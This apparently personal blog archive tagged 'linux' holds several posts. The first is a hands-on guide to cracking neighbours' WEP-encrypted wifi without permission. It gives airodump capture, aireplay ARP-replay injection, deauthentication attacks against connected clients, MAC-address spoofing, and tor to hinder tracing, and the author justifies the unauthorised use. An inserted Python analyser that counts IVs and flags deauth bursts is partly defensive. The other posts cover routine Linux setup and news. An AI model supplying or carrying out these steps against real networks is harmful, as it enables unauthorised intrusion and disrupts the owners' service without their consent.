You are currently viewing all posts tagged with linux.

How to Own the Air

Before moving into my new place last month, I had planned on paying an ISP for internet access. But, complications arose with the company I had chosen, so I decided to cancel my order soon after it was placed. Instead, I planned to borrow internet access from my neighbors (hey, they’re pumping signals into my air-space). Trouble was, everyone had encrypted their networks with WEP. No doubt this is a good thing, and a vast improvement from the last time I had scanned down here (about 8 months ago), but I wanted in. I was able to justify cracking in to myself by recognizing that my paranoia isn’t limited just to the “others” out on the global interwebs – no, I’d be just as paranoid about the owner of whoever’s network I was breaking into watching my traffic. There was no question I’d make ample use of encryption, which, as a side benefit, meant that anything I did through his connection would be rather difficult to trace back. So, he was protected. As long as he wasn’t paying for bandwidth by the KB, he’d not be much affected by my leeching. (I use the pronoun “he” because I know now that the owner of my primary network is, in fact, a he – put a password on your routers, people!).

But there was another problem, in addition to WEP: during reconnaissance, I would rarely pick up any connected clients. Perhaps I was always trying at the wrong time of day. Or perhaps people pay for internet access and never use it. Regardless, it would have taken weeks of constant logging to gather enough IVs to crack the WEP key. So, the first step was to take the money I had saved by canceling my order with the ISP, and invest in a new wireless card that supported packet injection.

The Proxim 8470-WD (from aircrack-ng’s recommended list) caught my eye, though it took a while before I could find it at a decent price. To do my initial cracking, I popped in Backtrack and followed aircrack-ng’s newbie guide. (I had upgraded my trusty old Auditor cd to Backtrack just for this occasion. It’s quite the nice distribution.) Within about 5 minutes, I had gained access to the first network. Goes to show how secure WEP is.

Though the Proxim card is plug and play in Ubuntu, the steps to crack WEP are a little different. Here’s what I do (note that I do recommend using Backtrack, instead).

First, of course, one must install aircrack:

sudo apt-get install aircrack

You may change your MAC address manually, or, if you aren’t concerned with anonymity, not change it at all. I prefer the macchanger tool:

sudo apt-get install macchanger

Set your card’s MAC address randomly. In this case, the network device is at ath0:

sudo ifconfig ath0 down
sudo macchanger -r ath0
sudo ifconfig ath0 up

Put your card into monitor mode:

sudo iwconfig ath0 mode monitor

Start scanning:

sudo airodump ath0 dump 0

In this case, dump is the file prefix for airodump’s output and the 0 tells airodump to channel-hop. Now you want to pick your target network from the scan. It should have at least one client connected (displayed at the bottom of airodump’s output), the more the merrier. (Hopefully that client is transmitting data, too.)

When you pick your target, kill the first instance of airodump and start it up again, this time specifying the channel of your target:

sudo airodump ath0 targetdump 9

The targetdump is the file prefix and 9 is the channel. Optionally you can add a 1 to the end of the command, which tells airodump to only capture IVs (which is what you’re after). Note that with that flag airodump writes targetdump.ivs instead of targetdump.cap, so point aircrack at the .ivs file. I normally don’t bother.

When you’ve captured somewhere in the range of 250,000 - 500,000 data packets (shown by airodump in the “Packets” column of your target; only data frames carry IVs, beacons don’t count), you can start cracking:

aircrack -b 00:12:34:45:78:A3 targetdump.cap

In this case, -b is the BSSID (the MAC address of the target access point, not its ESSID). Cracking could take minutes, hours, days, weeks, months, or years. I’ve never had to wait over 20 minutes.

But what if the client is being a party-pooper and not transmitting? That’s where packet injection comes in. From aircrack’s guide:

ARP works (simplified) by broadcasting a query for an IP and the device that has this IP sends back an answer. Because WEP does not protect against replay, you can sniff a packet, send it out again and again and it is still valid. So you just have to capture and replay an ARP-request targeted at the AP to create lots of traffic (and sniff IVs).

You’ll want to keep airodump running, so that all the traffic you generate will be captured. In another terminal, start injecting:

sudo aireplay -3 -b 00:12:34:45:78:A3 -h A3:78:45:34:12:00 ath0

The -3 tells aireplay you want to replay ARP requests, -b is the BSSID of the target network, and -h is the MAC address of an associated client, which the replayed frames are sent from (the AP will drop frames from a station that isn’t associated). In a little bit, aireplay should inform you that it has captured 1 (or more) ARP packets. Sit back and watch airodump count up the IVs.

If that pesky client still isn’t cooperating, you can give it a little motivation. From aircrack:

Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID during reconnection too. This comes in handy if the ESSID of your target is hidden. ...the risk that someone recognizes this attack or at least attention is drawn to the stuff happening on the WLAN is higher than with other attacks.

Keep airodump and aireplay running, and in a new terminal give it a little kick in the butt:

sudo aireplay -0 5 -a 00:12:34:45:78:A3 -c A3:78:45:34:12:00 ath0

The first switch, -0, tells aireplay to send deauthentication frames (5 of them, per the count that follows it), -a is the BSSID of the target network, -c is the target client. When the client reconnects, you should start grabbing ARP requests.

After you have enough packets, crack the WEP key as before.
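As an added example (not from the original post and not part of the aircrack suite), here is a small Python analyser that does offline, on constructed frames, what the commands above are doing on the air: it extracts the 24-bit IV from WEP-protected data frames and counts distinct IVs per BSSID (the number airodump counts up), flags reused IVs (the same RC4 keystream used twice, the weakness aircrack’s statistical attack builds on), picks out frames shaped like broadcast ARP requests (the selection rule aireplay -3 relies on, since it cannot read the plaintext) and counts deauthentication bursts per AP/client pair (the on-air signature of aireplay -0, which is why the guide warns that it draws attention). It assumes raw 802.11 frames without a radiotap header; the BSSID and client MACs are the example addresses used in the commands above, and every frame is constructed in the block, so it runs without a wireless card.

```python
"""Minimal 802.11 frame analyser for the WEP workflow: IV counting, IV reuse,
ARP-request candidates (what aireplay -3 replays) and deauth bursts
(what aireplay -0 sends). Raw frames only, no radiotap header. Example code."""
import struct
from collections import Counter, defaultdict

TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12
FLAG_TODS, FLAG_FROMDS, FLAG_PROTECTED = 0x01, 0x02, 0x40
BROADCAST = b"\xff" * 6
ARP_REQ_LEN = 36  # LLC/SNAP (8) + ARP (28): the fixed size aireplay -3 matches on


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(raw):
    """Return a dict for one 802.11 frame, or None if too short / unsupported."""
    if len(raw) < 24:
        return None
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    f = {"type": ftype, "subtype": subtype}
    if ftype == TYPE_MGMT:  # addr1 = DA, addr2 = SA, addr3 = BSSID
        f.update(dst=mac(a1), src=mac(a2), bssid=mac(a3))
        if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(raw) >= 26:
            f["reason"] = struct.unpack("<H", raw[24:26])[0]
    elif ftype == TYPE_DATA:
        tods, fromds = fc1 & FLAG_TODS, fc1 & FLAG_FROMDS
        if tods and not fromds:        # station -> AP
            bssid, src, dst = a1, a2, a3
        elif fromds and not tods:      # AP -> station
            bssid, src, dst = a2, a3, a1
        elif not tods and not fromds:  # ad hoc
            bssid, src, dst = a3, a2, a1
        else:                          # 4-address WDS frames: out of scope
            return None
        f.update(bssid=mac(bssid), src=mac(src), dst=mac(dst))
        if fc1 & FLAG_PROTECTED and len(raw) >= 32:
            f["iv"] = raw[24:27]        # 24-bit IV, sent in the clear
            f["keyidx"] = raw[27] >> 6  # key index in the top two bits
            f["body"] = raw[28:-4]      # ciphertext with the 4-byte ICV stripped
    return f


def wep_iv_stats(frames):
    """Per BSSID: protected data frames, distinct IVs, and IVs seen more than once.
    A repeated IV means the same RC4 keystream was reused; aircrack wants many
    distinct IVs, which is the number airodump counts up."""
    per_ap = defaultdict(Counter)
    for f in frames:
        if f and "iv" in f:
            per_ap[f["bssid"]][f["iv"]] += 1
    return {b: {"data": sum(c.values()), "unique_ivs": len(c),
                "reused_ivs": sorted(iv.hex() for iv, n in c.items() if n > 1)}
            for b, c in per_ap.items()}


def looks_like_arp_request(f):
    """aireplay -3 cannot read WEP plaintext, so it picks ARP requests by shape:
    protected data frame, broadcast destination, fixed ciphertext length."""
    return bool(f) and "body" in f and f["dst"] == mac(BROADCAST) and len(f["body"]) == ARP_REQ_LEN


def deauth_bursts(frames, threshold=5):
    """(BSSID, target) pairs hit by >= threshold deauth/disassoc frames: a burst
    like `aireplay -0 5` stands out to anyone watching the channel."""
    counts = Counter()
    for f in frames:
        if f and f["type"] == TYPE_MGMT and f["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            counts[(f["bssid"], f["dst"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


# --- constructed sample capture (not real traffic) ---------------------------
def build_wep_data(bssid, src, dst, iv, body, keyidx=0):
    fc = bytes([0x08, FLAG_TODS | FLAG_PROTECTED])  # data, ToDS, WEP bit set
    return fc + b"\0\0" + bssid + src + dst + b"\0\0" + iv + bytes([keyidx << 6]) + body + b"\0" * 4


def build_deauth(ap, target, reason=7):
    fc = bytes([0xC0, 0x00])  # management frame, subtype 12 (deauthentication)
    return fc + b"\0\0" + target + ap + ap + b"\0\0" + struct.pack("<H", reason)


AP = bytes.fromhex("0012344578a3")      # the post's example BSSID
CLIENT = bytes.fromhex("a37845341200")  # the post's example client
ARP_CT = bytes(range(ARP_REQ_LEN))      # stand-in ciphertext of one ARP request
SAMPLE = (
    [build_wep_data(AP, CLIENT, BROADCAST, bytes([0, 0, i]), ARP_CT) for i in range(3)]
    + [build_wep_data(AP, CLIENT, BROADCAST, bytes([0, 0, 1]), ARP_CT)]  # the same frame replayed
    + [build_deauth(AP, CLIENT)] * 5  # aireplay -0 5 (real aireplay also sends the reverse direction)
)


def analyse(raw_frames):
    frames = [parse_frame(r) for r in raw_frames]
    return {"ivs": wep_iv_stats(frames),
            "arp_candidates": sum(looks_like_arp_request(f) for f in frames),
            "deauth": deauth_bursts(frames)}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(key, value)
```

On the constructed capture the replayed frame shows up as one reused IV (000001), which is exactly why airodump reports unique IVs rather than raw packet counts: a replayed frame adds traffic but no new keystream. Feed it a real capture (strip the radiotap header first) and the deauth counter doubles as a crude detector for the -0 attack.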

To manage and connect to my wireless networks, I’ve taken to using wifi-radar. It scans for networks, allows you to specify which networks you prefer and, for each network, allows you to set preferences such as the WEP key, whether to use dynamic or static addresses, and the like. What I like best is the connection commands, which allow you to set commands you want executed before wifi-radar connects to the network, and after. In the before field, I have it randomly change my MAC address:

ifconfig ath0 down && macchanger -r ath0 && ifconfig ath0 up

After it connects, I restart tor:

/etc/init.d/tor restart

(As another reference for you, this site keeps turning up as a guide to cracking WEP in Ubuntu.)

Ubuntu Dapper Beta

Yesterday, I decided to give the latest Ubuntu beta a go. I first tried to upgrade using Ubuntu’s update-manager, but, alas, GUIs never work. It crashed while trying to upgrade Kino, which also left me with a broken X server. I had downloaded the new Live CD beforehand, so I just booted into that and used the installer. The partitioning tool insisted that my new swap was to be only 1K, which I wasn’t too pleased with. After killing the installer, manually setting my partitions with fstab, and then rerunning the installer, everything worked fine. By the time I rebooted, there were already 65 packages to update. After that, I had to add in some new repos and install the usual additional software.

So far, I’m happy with the release. It seems a bit faster, looks much nicer, and, of course, has a whole slew of updated software.

LinuxFest 2006

This year’s lineup for LinuxFest isn’t very impressive. It’s disappointing. The first year I live only a few minutes away is the year that the speakers don’t interest me. I’m not sure if I’ll go.

Pearle Vision runs Linux

I went into Pearle Vision today. When I was walking around the store, I accidentally bumped one of the computers. And what did I see? The XScreenSaver password prompt! Yes, Pearle Vision is running Linux. And not just in the backroom, these were the actual workstations out in the showroom. Cool stuff.

Firefox/Thunderbird in slackware-current

Thanks to this post on LQ, I discovered that Firefox and Thunderbird have been added to slackware-current. Sweetness. Now I just hope that the next version ships with 2.6 as default so I don’t have to upgrade whenever I install.

Cedega Tweaks

There’s a nice Cedega Tweaking Guide over at LinuxGamers. It’s meant for Half-Life 2, but most of the tweaks apply to all games. I did the following:

Some distributions need to set up a system variable. First, you have to examine if it is set:

cat /proc/sys/vm/legacy_va_layout

No output means that this variable isn't set. As root:

echo 1 > /proc/sys/vm/legacy_va_layout

This setting only survives up to the next reboot. To set up this variable permanently, open your /etc/sysctl.conf and append vm.legacy_va_layout = 1

VIDEORAM: Don't forget to set Videoram and AGPVertexRAM to the values of your graphics card. Read the description in the config file and in the release notes of Cedega. The best value for video cards with 256MB of video RAM is: "VideoRam" = "256" and "AGPVertexRam" = "128". Use adjusted values after this pattern for cards with less memory.

ALSA: If you have ALSA then use the winealsa.drv of Cedega. It will give you a small FPS boost. Open ~/.transgaming/config or ~/.point2play//config and edit the [WinMM] section to "Driver" = "winealsa.drv"

Dell 8600

I have a new laptop, a Dell Inspiron 8600. The specs are as follows:

  • Intel Pentium M 755 (2GHz/400MHz FSB) 15.4 WSXGA+
  • 1GB DDR SDRAM (2 Dimms)
  • 64MB DDR Nvidia GeForce FX Go5200
  • 8x CD/DVD burner (DVD+/-RW) w/ double-layer writing capability
  • 100GB Hard Drive
  • Integrated 10/100 NIC/Modem
  • Intel Pro/Wireless 2200 Internal (802.11b/g, 54Mbps)

I lucked out with the video card. Granted 64MB isn’t too hot, but ATI Linux support is dicey, so I wanted an Nvidia. Nick is also looking to get a new laptop and he discovered a few days ago that Dell is no longer selling the 8600 with Nvidia cards (probably why I got 25% off).

When I got the thing it was running Windows XP. Of course I wanted Linux. I wasn’t quite sure what distro I wanted to put on it, but I was leaning towards Slack.

The first order of business was to burn the Slackware 10.1 ISOs I’d downloaded earlier. I swear I was in Windows for at least 45 minutes trying to figure out how to burn a damn ISO. After that I just got fed up with it, formatted and installed Suse (which, by the way, resized and kept the Windows partitions. Interesting). After about three seconds in Suse I was burning the images. And they call Windows user-friendly…

The next few hours were spent distro-whoring. I went through Suse, Ubuntu, Gentoo, and Slackware, finally settling on Slack.

Getting everything to work in Slackware took a little work, but wasn’t too much trouble.

The first thing was, of course, to install the Nvidia drivers. Grabbing them off Nvidia’s site and installing them the normal way works fine (ignore the warning the installer gives about the conflicting rivafb module). My trouble was getting X to load after that. With the help of Google, I was able to make a custom xorg.conf that worked just dandy.

The second thing I wanted working was the wireless, which uses the ipw2200 module. I don’t know if it supports kernel 2.4, but I couldn’t get it working without upgrading to 2.6 (slackware 10.1 still ships with 2.4, with 2.6 in /testing).

Upgrading to 2.6 is easy. Simply read the README.initrd in /testing/packages/linux-2.6.10/. In the step that has you installpkg everything, I’d also add kernel-source (44MB).

When I got 2.6 running, it was a simple matter of doing make, make install on ipw2200. Then I extracted the firmware to /lib/firmware. After that finishes:

modprobe ipw2200
iwconfig
dhcpcd eth0

Also, reading the iwconfig man page is helpful.

Now the wireless is running. To switch back to the wired connection, do a

modprobe -r ipw2200
modprobe b44
ifconfig eth0 up

The next thing was sound. Since I’d upgraded to 2.6, I needed to install the new alsa-drivers. After that, there’s the problem of a conflicting module named snd_intel8x0m (the ALSA driver for the AC’97 modem on the same chipset, which grabs the device before the sound driver can). That needs to be removed and added to the blacklist.

modprobe -r snd_intel8x0m
pico /etc/hotplug/blacklist

Now all that’s left to do is run alsaconf and alsamixer to adjust volume.

It’s been running great for a few days now. The only thing I’m still working on is getting ACPI fully working (i.e. making the screen turn off when it’s closed).

Job Shadow

I was able to skip school today and job shadow at Intermec. I shadowed two UNIX admins for most of the day. It was good times. I learned a lot, played with new toys, and spent time in the GNOC (global network operations center). They were surprised I knew anything about Linux (I turned a couple people on to Slackware and Gentoo), and the engineering guys want me to work for them.

In other news, being in the mall when the power goes out is cool.